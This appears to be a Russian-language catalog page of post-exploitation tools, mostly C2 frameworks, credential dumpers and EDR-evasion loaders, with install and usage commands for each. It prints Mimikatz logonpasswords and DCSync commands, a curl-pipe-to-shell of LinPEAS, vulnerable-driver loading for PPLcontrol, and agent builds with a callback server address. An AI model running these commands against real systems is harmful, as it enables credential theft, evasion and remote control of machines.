Каталог инструментов

62 инструментов

Тег: post-exploitation ×

LazyOwn

vrelease/0.2.151
Post-Exploitation

Комплексный red-team фреймворк с C2 на базе AI, полиморфными имплантами и встроенными инструментами пост-эксплуатации.

git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn bash install.sh

Manjusaka

Post-Exploitation

C2-фреймворк на Rust (агент) и Go (сервер) с веб-панелью управления: сбор системной информации, скриншоты, кейлоггинг, работа с файлами, выполнение команд, извлечение сохранённых паролей браузеров. Получил известность в 2022 …

# Требования: Rust 1.85+, Cargo, Protocol Buffers compiler, OpenSSL dev headers git clone https://git.toolsofthetrade.qzz.io/recovered/manjusaka.git cd manjusaka cargo build --workspace --release # Запуск сервера управления (nps) ./target/release/nps # Веб-панель: https://localhost:33000/manjusaka/static # Дальше в панели: добавить листенер (внешний IP) -> создать проект (callback = внешний IP, # слушатель — только что созданный) -> сгенерировать агент npc1 -> запустить на цели -> # после коннекта агент подгружает расширенный npc2 и открывает обратное соединение.

Merlin

v2.1.4
Exploitation

Кроссплатформенный C2-сервер и агент на Go с транспортом по HTTP/2 для постэксплуатационных сценариев в рамках авторизованного пентеста.

wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z 7z x merlinServer-Linux-x64.7z sudo ./merlinServer-Linux-x64 ./data/bin/merlinCLI-Linux-x64

Mimikatz

v2.2.0-20220919
Post-Exploitation

Инструмент для извлечения паролей, хешей, PIN-кодов и Kerberos-тикетов из памяти Windows. Поддерживает Pass-the-Hash, Pass-the-Ticket, Golden/Silver Ticket, DCSync и другие техники. Стандартный инструмент любого Windows-пентеста и red team операции.

# Сборка из исходников (Visual Studio 2019+): git clone https://github.com/gentilkiwi/mimikatz # Открыть mimikatz.sln, собрать x64 Release # Или скачать готовый бинарь: # https://github.com/gentilkiwi/mimikatz/releases # Запуск и дамп паролей: mimikatz.exe privilege::debug sekurlsa::logonpasswords lsadump::dcsync /domain:corp.local /user:Administrator

Mythic

v3.4.0.5
Post-Exploitation

Модульный C2-фреймворк с веб-интерфейсом, поддерживающий множество агентов (Apollo, Poseidon, Medusa и др.) через Docker-контейнеры. Поддерживает Windows, Linux, macOS. Каждый агент — отдельный плагин, легко расширяется.

# Требуется Docker и Docker Compose: git clone https://github.com/its-a-feature/Mythic cd Mythic sudo ./install_docker_ubuntu.sh sudo make # Установка агента: sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo # Запуск: sudo ./mythic-cli start # Веб-интерфейс: https://localhost:7443

NTPShell

Post-Exploitation

Скрытый C2-канал, передающий команды и данные внутри NTP-пакетов — трафик выглядит как обычная синхронизация времени и слабо детектируется сетевым мониторингом. Написан на C, сервер и клиент в одном …

git clone https://git.toolsofthetrade.qzz.io/recovered/ntpshell.git cd ntpshell gcc ntp.c -lpthread -o ntp # C2-сервер: ./ntp -S # C2-клиент (управляемая машина): ./ntp -C -s <server_addr>

Nanodump

vlatest
Post-Exploitation

Компактный инструмент для исследования дампинга учётных данных — изучает защиту LSASS и методы обнаружения доступа к памяти процесса.

git clone https://github.com/fortra/nanodump.git make -f Makefile.mingw

Nyx C2

Post-Exploitation

Модульный C2-фреймворк с кроссплатформенным агентом, сбором учётных данных и латеральным перемещением.

git clone https://github.com/omerbyrb/nyx cd nyx docker compose up -d cd server python3.11 -m venv .venv && source .venv/bin/activate pip install -r requirements.txt cd dashboard npm install && npm run dev cd agent go build -o nyx-agent . GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -X main.C2URL=http://YOUR_SERVER:8000" -o nyx-agent.exe . GOOS=linux GOARCH=amd64 go build -ldflags="-s -w -X main.C2URL=http://YOUR_SERVER:8000" -o nyx-agent-linux .

PEASS-ng (LinPEAS)

v20260701-584b0e93
Exploitation

Набор скриптов для поиска путей повышения привилегий. LinPEAS — для Linux/macOS, WinPEAS — для Windows. Автоматически проверяет сотни векторов: • SUID/SGID бинарники • Cron jobs с небезопасными путями …

# LinPEAS — запуск напрямую с GitHub (без сохранения на диск) curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh # Скачать и запустить wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh chmod +x linpeas.sh && ./linpeas.sh # WinPEAS (.exe или .bat) # https://github.com/peass-ng/PEASS-ng/releases # С цветовым выводом и записью в файл ./linpeas.sh -a 2>&1 | tee linpeas_output.txt

PPLcontrol

vlatest
Post-Exploitation

Инструмент для исследования и работы с механизмом Protected Process Light (PPL) в Windows в контексте авторизованного тестирования.

git clone https://github.com/itm4n/PPLcontrol.git # Сборка: # 1. Открыть решение (.sln) в Visual Studio # 2. Выбрать конфигурацию Release/x64 (x86 не поддерживается) # 3. Собрать решение # Установка драйвера (в виртуальной машине): sc.exe create RTCore64 type= kernel start= auto binPath= C:\PATH\TO\RTCore64.sys DisplayName= "Micro - Star MSI Afterburner" net start RTCore64 # Пример использования PPLcontrol.exe list PPLcontrol.exe get 1234 PPLcontrol.exe set 1234 PPL WinTcb PPLcontrol.exe protect 1234 PPL WinTcb PPLcontrol.exe unprotect 1234 net stop RTCore64 sc.exe delete RTCore64

Peirates

v1.29
Cloud & Container Security

Инструмент для тестирования на проникновение Kubernetes-кластеров: повышение привилегий, латеральное перемещение и захват кластера.

go get -v "github.com/inguardians/peirates" go get -v "k8s.io/kubectl/pkg/cmd" "github.com/aws/aws-sdk-go" cd $GOPATH/github.com/inguardians/peirates/scripts ./build.sh

Phantom-Evasion-Loader

v1.0.0
Exploitation

Инжектор на чистом x64 ассемблере, обходящий EDR/XDR через SROP и прямые межпроцессные записи.

git clone https://github.com/JM00NJ/Phantom-Evasion-Loader cd Phantom-Evasion-Loader python3 xor.py